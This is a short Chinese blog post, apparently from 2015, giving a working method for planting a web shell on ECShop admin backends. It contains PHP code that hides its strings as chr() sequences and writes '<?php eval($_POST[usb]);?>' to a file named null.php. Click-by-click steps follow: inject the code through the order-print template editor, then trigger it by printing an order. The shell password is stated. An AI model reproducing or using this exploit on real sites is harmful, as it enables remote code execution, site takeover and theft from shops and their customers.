ecshop后台获取shell,通杀最新版本&后台低权限(2011)

后台可以提交构造代码绕过过滤,成功解析生成一句话木马.

<?php



$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);



$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);



$a=chr(119);



$fp=@fopen($filen,$a);



$msg=@fwrite($fp,$filec);



if($msg) echo chr(79).chr(75).chr(33);



@fclose($fp);



?>

后台-订单管理-订单打印-选择源代码编辑-保存

返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功!

 

一句话密码为usb

posted @ 2015-09-28 10:07  小生观察室  阅读(89)  评论(0编辑  收藏  举报